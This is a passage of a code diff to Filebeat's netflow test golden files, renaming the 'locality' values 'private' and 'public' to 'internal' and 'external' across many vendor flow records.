@@ "source": { "bytes": 33129, "ip": "10.22.166.17", - "locality": "private", + "locality": "internal", "packets": 220, "port": 0 } @@ -1357,7 +1357,7 @@ "Fields": { "destination": { "ip": "10.21.75.38", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1376,7 +1376,7 @@ }, "flow": { "id": "ru0mPvG-tKw", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1433,7 +1433,7 @@ "source": { "bytes": 5092, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 9, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json index 0afe853c1ec9..ac09cba74794 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 0, "ip": "10.111.112.204", - "locality": "private", + "locality": "internal", "port": 2598 }, "event": { @@ -27,7 +27,7 @@ }, "flow": { "id": "d-FUjj8eKi8", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -84,7 +84,7 @@ "source": { "bytes": 200, "ip": "10.108.219.53", - "locality": "private", + "locality": "internal", "packets": 4, "port": 45587 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json index 58ebb30be4c4..3aed82dc6f9b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 137 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "X6k2SQeAX5c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.2", @@ -70,7 +70,7 @@ "source": { "bytes": 78, "ip": "192.168.0.3", - "locality": "private", + "locality": "internal", "packets": 1, "port": 137 } @@ -84,7 +84,7 @@ "Fields": { "destination": { "ip": "192.168.0.5", - "locality": "private", + "locality": "internal", "port": 6343 }, "event": { @@ -100,7 +100,7 @@ }, "flow": { "id": "XEzNKvE_H1k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.5", @@ -147,7 +147,7 @@ "source": { "bytes": 232, "ip": "192.168.0.4", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58130 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json index 5406a7ae845a..d0207ba3192b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "134.220.1.156", - "locality": "public", + "locality": "external", "port": 50234 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "A-NpGXd6eh4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "134.220.1.156", @@ -76,7 +76,7 @@ "source": { "bytes": 363, "ip": "134.220.2.6", - "locality": "public", + "locality": "external", "packets": 3, "port": 88 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json index 931c4a8e2767..79e31dd7f6b7 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.32.91.205", - "locality": "private", + "locality": "internal", "port": 49519 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "0HZ2F4aNlps", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.32.91.205", @@ -76,7 +76,7 @@ "source": { "bytes": 70, "ip": "23.35.171.27", - "locality": "public", + "locality": "external", "packets": 1, "port": 80 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "162.115.24.30", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -109,7 +109,7 @@ }, "flow": { "id": "GTu1zsDt3yw", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "162.115.24.30", @@ -159,7 +159,7 @@ "source": { "bytes": 111, "ip": "10.32.105.103", - "locality": "private", + "locality": "internal", "packets": 1, "port": 39702 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "34.202.173.126", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -192,7 +192,7 @@ }, "flow": { "id": "nUCuFEB8z_c", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "34.202.173.126", @@ -242,7 +242,7 @@ "source": { "bytes": 70, "ip": "10.32.144.145", - "locality": "private", + "locality": "internal", "packets": 1, "port": 52069 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "10.130.145.44", - "locality": "private", + "locality": "internal", "port": 49449 }, "event": { @@ -275,7 +275,7 @@ }, "flow": { "id": "inYZm0Y9EVM", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.130.145.44", @@ -325,7 +325,7 @@ "source": { "bytes": 70, "ip": "23.209.52.99", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } @@ -339,7 +339,7 @@ "Fields": { "destination": { "ip": "10.50.96.20", - "locality": "private", + "locality": "internal", "port": 5432 }, "event": { @@ -358,7 +358,7 @@ }, "flow": { "id": "6vds_sLxXqE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.50.96.20", @@ -408,7 +408,7 @@ "source": { "bytes": 78, "ip": "10.50.97.57", - "locality": "private", + "locality": "internal", "packets": 1, "port": 55481 } @@ -422,7 +422,7 @@ "Fields": { "destination": { "ip": "10.50.97.57", - "locality": "private", + "locality": "internal", "port": 55481 }, "event": { @@ -441,7 +441,7 @@ }, "flow": { "id": "6vds_sLxXqE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.50.97.57", @@ -491,7 +491,7 @@ "source": { "bytes": 78, "ip": "10.50.96.20", - "locality": "private", + "locality": "internal", "packets": 1, "port": 5432 } @@ -505,7 +505,7 @@ "Fields": { "destination": { "ip": "10.48.208.209", - "locality": "private", + "locality": "internal", "port": 60068 }, "event": { @@ -524,7 +524,7 @@ }, "flow": { "id": "v3XVGdLaIe4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.48.208.209", @@ -574,7 +574,7 @@ "source": { "bytes": 70, "ip": "34.234.173.147", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } @@ -588,7 +588,7 @@ "Fields": { "destination": { "ip": "65.52.108.254", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "aenMB9Z5Tzc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "65.52.108.254", @@ -657,7 +657,7 @@ "source": { "bytes": 70, "ip": "10.130.167.43", - "locality": "private", + "locality": "internal", "packets": 1, "port": 62196 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json index 94d3ea85b2b9..1319ba663cc1 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.231.128.150", - "locality": "private", + "locality": "internal", "port": 50073 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "wdxUeEaOBho", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.231.128.150", @@ -71,7 +71,7 @@ "source": { "bytes": 128, "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "packets": 3, "port": 8080 } @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "port": 8080 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "wdxUeEaOBho", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "100.78.40.201", @@ -149,7 +149,7 @@ "source": { "bytes": 172, "ip": "10.231.128.150", - "locality": "private", + "locality": "internal", "packets": 4, "port": 50073 } @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "10.27.8.20", - "locality": "private", + "locality": "internal", "port": 53483 }, "event": { @@ -182,7 +182,7 @@ }, "flow": { "id": "6_Ia6lqx2cg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.27.8.20", @@ -227,7 +227,7 @@ "source": { "bytes": 3943, "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "packets": 10, "port": 8080 } @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "port": 8080 }, "event": { @@ -260,7 +260,7 @@ }, "flow": { "id": "6_Ia6lqx2cg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "100.78.40.201", @@ -305,7 +305,7 @@ "source": { "bytes": 3052, "ip": "10.27.8.20", - "locality": "private", + "locality": "internal", "packets": 11, "port": 53483 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json index 07680d7cffa6..e6cb0fb4112b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 17232 }, @@ -27,7 +27,7 @@ }, "flow": { "id": "KYJ6RiyA5YM", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -79,7 +79,7 @@ "source": { "bytes": 174, "ip": "10.1.0.135", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 2, "port": 53 @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 17232 }, @@ -114,7 +114,7 @@ }, "flow": { "id": "4GHcyowN7sg", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -166,7 +166,7 @@ "source": { "bytes": 87, "ip": "10.1.0.136", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 1, "port": 53 @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 51369 }, @@ -201,7 +201,7 @@ }, "flow": { "id": "GRn2z1Rao3c", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -253,7 +253,7 @@ "source": { "bytes": 1920, "ip": "10.1.0.232", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 15, "port": 443 @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 51370 }, @@ -288,7 +288,7 @@ }, "flow": { "id": "iHA6jdIkqjA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -340,7 +340,7 @@ "source": { "bytes": 610, "ip": "10.1.0.232", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 8, "port": 443 @@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 44006 }, @@ -375,7 +375,7 @@ }, "flow": { "id": "cBjtKefzGos", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -427,7 +427,7 @@ "source": { "bytes": 2420, "ip": "10.5.0.91", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 21, "port": 443 @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 33282 }, @@ -462,7 +462,7 @@ }, "flow": { "id": "EzT0lQWYBRw", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -514,7 +514,7 @@ "source": { "bytes": 10204, "ip": "10.1.0.30", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 30, "port": 443 @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 64642 }, @@ -549,7 +549,7 @@ }, "flow": { "id": "TROGwofkmJA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -601,7 +601,7 @@ "source": { "bytes": 216, "ip": "10.3.0.100", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 4, "port": 443 @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 9497 }, @@ -636,7 +636,7 @@ }, "flow": { "id": "wLclDbADA9s", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -688,7 +688,7 @@ "source": { "bytes": 152, "ip": "10.1.0.135", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 1, "port": 53 @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "10.0.0.73", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -722,7 +722,7 @@ }, "flow": { "id": "LpdyE0SSB-o", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -774,7 +774,7 @@ "source": { "bytes": 260, "ip": "192.168.1.98", - "locality": "private", + "locality": "internal", "packets": 5, "port": 55105 } @@ -788,7 +788,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 10001 }, "event": { @@ -807,7 +807,7 @@ }, "flow": { "id": "32P6av-L8P0", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -859,7 +859,7 @@ "source": { "bytes": 32, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 42506 } @@ -873,7 +873,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 37868 }, "event": { @@ -892,7 +892,7 @@ }, "flow": { "id": "ft_m5C7Hgpo", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -944,7 +944,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 40295 } @@ -958,7 +958,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56911 }, "event": { @@ -977,7 +977,7 @@ }, "flow": { "id": "bVX88Ii80AQ", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1029,7 +1029,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 36071 } @@ -1043,7 +1043,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56327 }, "event": { @@ -1062,7 +1062,7 @@ }, "flow": { "id": "bA4nBN4veuI", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1114,7 +1114,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 49829 } @@ -1128,7 +1128,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56239 }, "event": { @@ -1147,7 +1147,7 @@ }, "flow": { "id": "lY5yfRKXE3s", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1199,7 +1199,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 35059 } @@ -1213,7 +1213,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 39832 }, "event": { @@ -1232,7 +1232,7 @@ }, "flow": { "id": "x3GfEtY3zCQ", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1284,7 +1284,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 38231 } @@ -1298,7 +1298,7 @@ "Fields": { "destination": { "ip": "10.2.0.95", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -1317,7 +1317,7 @@ }, "flow": { "id": "bfT831bq5AI", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1369,7 +1369,7 @@ "source": { "bytes": 3668, "ip": "192.168.1.102", - "locality": "private", + "locality": "internal", "packets": 21, "port": 47690 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json index 1311a75ee5cb..879714e24c07 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "80.82.237.40", - "locality": "public", + "locality": "external", "port": 445 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "tS3zN7t_rFg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "80.82.237.40", @@ -75,7 +75,7 @@ "source": { "bytes": 52, "ip": "192.168.200.136", - "locality": "private", + "locality": "internal", "packets": 1, "port": 61926 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json index 7675fa91b412..2b7dded5bd6a 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "193.151.198.166", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dd", "port": 36025 }, @@ -27,7 +27,7 @@ }, "flow": { "id": "XLC-7u3wi0U", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "193.151.198.166", @@ -79,7 +79,7 @@ "source": { "bytes": 156, "ip": "37.122.1.226", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 27622 @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "193.151.199.69", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dd", "port": 29598 }, @@ -114,7 +114,7 @@ }, "flow": { "id": "2mdiEm9z6pA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "193.151.199.69", @@ -166,7 +166,7 @@ "source": { "bytes": 48, "ip": "5.141.231.166", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 1, "port": 31178 @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "212.224.113.74", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 443 }, @@ -201,7 +201,7 @@ }, "flow": { "id": "IKsDJxZK5UA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "212.224.113.74", @@ -253,7 +253,7 @@ "source": { "bytes": 584, "ip": "10.233.128.4", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 11, "port": 53688 @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.236.8.4", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dc", "port": 51549 }, @@ -288,7 +288,7 @@ }, "flow": { "id": "lfpS1KL7LwI", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.236.8.4", @@ -340,7 +340,7 @@ "source": { "bytes": 577, "ip": "193.151.192.46", - "locality": "public", + "locality": "external", "mac": "00:1a:4a:16:01:81", "packets": 4, "port": 80 @@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "62.221.115.205", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 1024 }, @@ -375,7 +375,7 @@ }, "flow": { "id": "HRyho8QOr5M", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "62.221.115.205", @@ -427,7 +427,7 @@ "source": { "bytes": 152, "ip": "10.235.197.6", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 57505 @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "37.146.125.64", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 3237 }, @@ -462,7 +462,7 @@ }, "flow": { "id": "jbL3H_oK7ok", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "37.146.125.64", @@ -514,7 +514,7 @@ "source": { "bytes": 152, "ip": "10.236.31.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 61471 @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "52.198.214.72", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 443 }, @@ -549,7 +549,7 @@ }, "flow": { "id": "ayKjfr1z0QU", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "52.198.214.72", @@ -601,7 +601,7 @@ "source": { "bytes": 1809, "ip": "10.233.151.8", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 15, "port": 58044 @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "64.233.161.188", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 5228 }, @@ -636,7 +636,7 @@ }, "flow": { "id": "B15R8wv_tVI", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "64.233.161.188", @@ -688,7 +688,7 @@ "source": { "bytes": 234, "ip": "10.234.22.4", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 60583 @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "185.209.20.240", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 80 }, @@ -723,7 +723,7 @@ }, "flow": { "id": "oYN-uwp504w", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "185.209.20.240", @@ -775,7 +775,7 @@ "source": { "bytes": 1681, "ip": "10.233.36.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 22, "port": 51399 @@ -790,7 +790,7 @@ "Fields": { "destination": { "ip": "84.39.245.175", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 18580 }, @@ -810,7 +810,7 @@ }, "flow": { "id": "MUPum_LUoxk", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "84.39.245.175", @@ -862,7 +862,7 @@ "source": { "bytes": 152, "ip": "10.233.200.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 61820 @@ -877,7 +877,7 @@ "Fields": { "destination": { "ip": "10.232.8.45", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dd", "port": 56257 }, @@ -897,7 +897,7 @@ }, "flow": { "id": "YStkNP0pV1E", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.232.8.45", @@ -949,7 +949,7 @@ "source": { "bytes": 1866, "ip": "23.43.139.27", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 80 @@ -964,7 +964,7 @@ "Fields": { "destination": { "ip": "10.233.150.21", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dd", "port": 38164 }, @@ -984,7 +984,7 @@ }, "flow": { "id": "nkastJ_vPI4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.233.150.21", @@ -1036,7 +1036,7 @@ "source": { "bytes": 187, "ip": "2.17.140.47", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 443 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json index 7f75a6ddf2ac..7db570f5db18 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json @@ -43,7 +43,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 22 }, @@ -60,7 +60,7 @@ }, "flow": { "id": "zQfsdfKgh-o", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -96,7 +96,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 65058 } @@ -110,7 +110,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:8d:af:c3", "port": 123 }, @@ -127,7 +127,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -163,7 +163,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 123 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 123 }, @@ -194,7 +194,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -230,7 +230,7 @@ }, "source": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:8d:af:c3", "port": 123 } @@ -244,7 +244,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 }, @@ -261,7 +261,7 @@ }, "flow": { "id": "B-_-kE8PEgA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -297,7 +297,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59157 } @@ -311,7 +311,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59157 }, @@ -328,7 +328,7 @@ }, "flow": { "id": "B-_-kE8PEgA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -364,7 +364,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 } @@ -378,7 +378,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 }, @@ -395,7 +395,7 @@ }, "flow": { "id": "q6jss8DvXWE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -431,7 +431,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59158 } @@ -445,7 +445,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59158 }, @@ -462,7 +462,7 @@ }, "flow": { "id": "q6jss8DvXWE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -498,7 +498,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 } @@ -512,7 +512,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 139 }, @@ -529,7 +529,7 @@ }, "flow": { "id": "3TmuMjQR8Mk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": 